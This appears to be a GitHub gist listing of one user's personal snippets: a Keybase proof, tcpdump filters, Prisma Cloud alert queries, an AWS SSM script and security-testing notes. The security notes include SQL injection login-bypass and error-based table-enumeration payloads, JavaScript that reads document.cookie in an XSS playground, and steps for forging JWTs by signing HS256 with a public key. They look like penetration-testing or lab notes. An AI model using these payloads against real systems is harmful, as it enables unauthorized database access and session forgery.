dustinbutterworth

Keybase proof

I hereby claim:

• I am dustinbutterworth on github.
• I am dbutterworth (https://keybase.io/dbutterworth) on keybase.
• I have a public key ASDCBDTBXEIX_HgXk-xsI8G_3L-KQg_US9lhdLCn44qDrgo

To claim this, I am signing this object:

dustinbutterworth

# TCP Dump for HTTP GET including request/response headers and body:
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
# TCP Dump for HTTP POST including request/response headers and body:
tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

dustinbutterworth

# If you want to tag something so that Prisma Cloud doesn't alert on it if the tag contains a certain string value
# And you want to continue alerting if something does not have this specific tag at all, tag this onto your already existing query:
and ((tags[?(@.key=='PrismaCloudMonitored' && @.value!='no')] size > 0) or (tags[*].key does not contain PrismaCloudMonitored))

# If you don't want prisma cloud to alert on SQL Express, since you can't encrypt SQL express:
 json.rule="(engine does not contain 'sqlserver-ex') and (dbiResourceId does not equal null and storageEncrypted is false)"

dustinbutterworth

username=' UNION SELECT "butters" as password FROM admins WHERE '1' = '1
password=butters


username=foo' OR (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
    shows table name admin
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
    gives id row
username=foo' or (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x61646d696e73 limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND '1' = '1
    gives username row

dustinbutterworth

# -*- coding: utf-8 -*-
import requests
import time
import os
import json
import sys

headers = {
    'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:77.0) Gecko/20100101 Firefox/77.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',

dustinbutterworth

// Show hostname
window.location.hostname

// show cookie
document.cookie

// background color
document.body.style.backgroundColor = "red"

// IP and Port Scan with javascript - XSS Playground

dustinbutterworth

# convert public key to hex so openssl will use it
cat $FILE | xxd -p | tr -d "\\n"

# openssl to sign as a valid HS256
echo -n "$JWT" | openssl dgst -sha256 -mac HMAC -macopt hexkey:$HEX_OF_PUBLIC_KEY

# decode hex to binary data then reencode it in base64
#!/usr/bin/env python3
import base64, binascii

dustinbutterworth

curl -s http://mirror.centos.org/centos/7/os/x86_64/Packages/ | grep ipa-client | cut -d '"' -f 12

dustinbutterworth

Credit to @fuxksniper (https://twitter.com/fuxksniper/status/1290710096524144640):

http://grep.app
http://hunter.io 
https://cxsecurity.com
https://exploit.in
https://xposedornot.com/phpvatch/
https://gcc.godbolt.org
https://2018.zeronights.ru/en/materials/
https://openpentest.com/find-subdomains

dustinbutterworth

#!/usr/bin/env bash
instance_id="i-***************"
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
sudo ./aws/install
curl "https://s3.amazonaws.com/session-manager-downloads/plugin/latest/linux_64bit/session-manager-plugin.rpm" -o "session-manager-plugin.rpm"
sudo yum install session-manager-plugin.rpm -y
/usr/local/bin/aws ssm start-session --target $instance_id

#Cleanup